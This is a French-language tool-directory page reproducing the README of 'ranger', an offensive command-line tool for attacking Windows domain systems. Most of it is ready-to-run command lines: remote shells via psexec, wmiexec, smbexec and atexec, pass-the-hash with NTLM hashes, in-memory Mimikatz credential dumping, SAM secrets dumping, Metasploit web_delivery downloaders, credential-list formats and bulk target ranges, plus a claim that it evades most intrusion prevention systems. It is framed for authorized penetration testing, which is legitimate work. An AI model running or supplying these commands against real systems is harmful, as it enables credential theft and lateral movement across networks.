Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ranger — Un outil pour les professionnels de la sécurité pour accéder et interagir avec des systèmes distants basés sur Microsoft Windows. | Kitploit
Outils/GitHubGitHub/funkandwagnalls/ranger
Génération de PayloadsExploitationMouvement LatéralPost-ExploitationTests d'IntrusionCommandement et Contrôle
GitHubfunkandwagnalls/ranger

ranger

Un outil pour les professionnels de la sécurité pour accéder et interagir avec des systèmes distants basés sur Microsoft Windows.

Voir le dépôt
4318216il y a 10 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ranger

Un outil pour aider les professionnels de la sécurité à accéder et interagir avec des systèmes distants Microsoft Windows.

Ce projet a été conceptualisé avec la réflexion suivante : nous n'avons pas inventé l'arc ni la flèche, juste une manière plus efficace de les utiliser.

Ranger est un outil d'attaque et de test de pénétration piloté en ligne de commande, capable d'utiliser un serveur catapulte instantané pour délivrer des capacités contre des systèmes Windows. Tant qu'un utilisateur dispose d'un jeu d'identifiants ou d'un jeu de hachages (NTLM, LM, LM:NTLM), il peut accéder à des systèmes faisant partie du domaine de confiance.

Grâce à cette capacité, un professionnel de la sécurité peut extraire des identifiants en mémoire en clair, accéder aux tables SAM, exécuter des commandes, des scripts PowerShell, des binaires Windows et d'autres outils. Actuellement, l'outil contourne la majorité des solutions IPS des fournisseurs, sauf si celles-ci ont été spécifiquement adaptées pour le détecter. L'outil a été développé dans nos laboratoires domestiques afin de soutenir les professionnels de la sécurité menant des activités légalement et/ou contractuellement autorisées.

Davantage de fonctionnalités sont ajoutées, mais pour l'instant l'outil utilise les contributions communautaires des dépôts liés aux équipes PowerShell PowerView, PowerShell Mimikatz et Impacket.

Gestion de Ranger :

Installation :

wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

Mise à jour :

ranger --update

Utilisation :

  • Ranger utilise une combinaison de méthodes et d'attaques ; une méthode sert à délivrer une attaque/commande
  • Une attaque est ce que vous essayez d'accomplir
  • Certains éléments sont à la fois une méthode et une attaque combinées, et certaines méthodes ne peuvent pas utiliser certaines attaques en raison des limitations actuelles des bibliothèques ou protocoles

Méthodes & Attaques :

--scout
--secrets-dump

Méthode :

--wmiexec
--psexec
--smbexec
--atexec

Attaque :

--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access

Exécution de commandes :

Trouver les utilisateurs connectés :

ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout

Shell de commande SMBEXEC :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv

Shell de commande PSEXEC :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv

Exécution de commande PSEXEC :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv

Exécution de commande WMIEXEC :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"

Injecteur mémoire PowerShell Mimikatz WMIEXEC :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker

Injecteur mémoire web_delivery Metasploit WMIEXEC (nécessite la configuration Metasploit, voir ci-dessous) :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader

Injecteur mémoire de code personnalisé WMIEXEC :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"

Exécution de commande ATEXEC :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder

Injecteur mémoire PowerShell Mimikatz ATEXEC :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder

Injecteur mémoire web_delivery Metasploit ATEXEC (nécessite la configuration Metasploit, voir ci-dessous) :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder

Injecteur mémoire de code personnalisé ATEXEC :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder

Injecteur mémoire de code personnalisé SECRETSDUMP :

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump

Créer une attaque Mimikatz prête à coller :

ranger.py --invoker -q -v -vv -vvv

Créer une attaque web_delivery prête à coller (nécessite la configuration Metasploit, voir ci-dessous) :

ranger.py --downloader -q -v -vv -vvv

Créer une attaque Executor prête à coller :

ranger.py --executor -q -v -vv -vvv

Identification des membres de groupes et des domaines

  • Lors de l'identification des groupes, assurez-vous de déterminer quel est le domaine de requête réel avec --get-domain-membership
  • Ensuite, lorsque vous interrogez un groupe, utilisez l'option facultative --domain, qui vous permet de cibler un domaine différent de celui auquel vous êtes connecté
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"

Remarques sur l'utilisation :

Format du fichier d'identifiants :

  • Vous pouvez lui passer une liste de noms d'utilisateur et mots de passe ou hachages dans le format suivant, dans le même fichier :
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM  domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain

Mises en garde concernant le fichier d'identifiants :

  • Si vous fournissez des noms de domaine dans le fichier, ils seront utilisés à la place de WORKGROUP par défaut.
  • Si vous fournissez le nom de domaine via la ligne de commande -d, cela indiquera que vous souhaitez ignorer tous les noms de domaine du fichier.

Exécution en ligne de commande :

  • Si vous ne souhaitez pas utiliser le fichier, vous pouvez passer les détails directement via la ligne de commande.
  • Si vous souhaitez fournir des hachages au lieu de mots de passe, passez-les simplement via l'argument du mot de passe.
  • S'ils sont au format PWDUMP et que vous ne fournissez pas de nom d'utilisateur, le nom d'utilisateur sera extrait du hachage.
  • Si vous fournissez un nom d'utilisateur, il considérera que le même hachage s'applique à un utilisateur différent.
  • Utilisez les formats suivants pour le mot de passe :
password
LM:NTLM
:NTLM
PWDUMP

Cibles et exclusions :

  • Les cibles et exclusions peuvent être utilisées simultanément

Cibles, plages de cibles, CIDR de cibles, listes de cibles, cibles XML NMAP :

  • Vous pouvez fournir une liste de cibles soit en utilisant une liste de cibles, soit via l'option de cible.
  • Vous pouvez fournir plusieurs fichiers de listes de cibles en les séparant par des virgules, et l'outil agrégera les données, supprimera les doublons puis exclura votre adresse IP de l'interface par défaut ou de l'interface que vous fournissez.
  • L'outil accepte les notations CIDR, les petites plages (192.168.195.1-100) ou les grandes plages (192.168.194.1-192.163.1.1) ou les adresses IP uniques.
  • Encore une fois, séparez-les par des virgules en ligne de commande ou placez-les dans un fichier délimité par des sauts de ligne.
  • Les XML NMAP peuvent également être utilisés pour cibler des systèmes, cela peut aussi être séparé par des virgules.
  • L'outil normalisera et supprimera les doublons avant de cibler les machines.
  • EXEMPLE : -t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml
Télécharger l’outil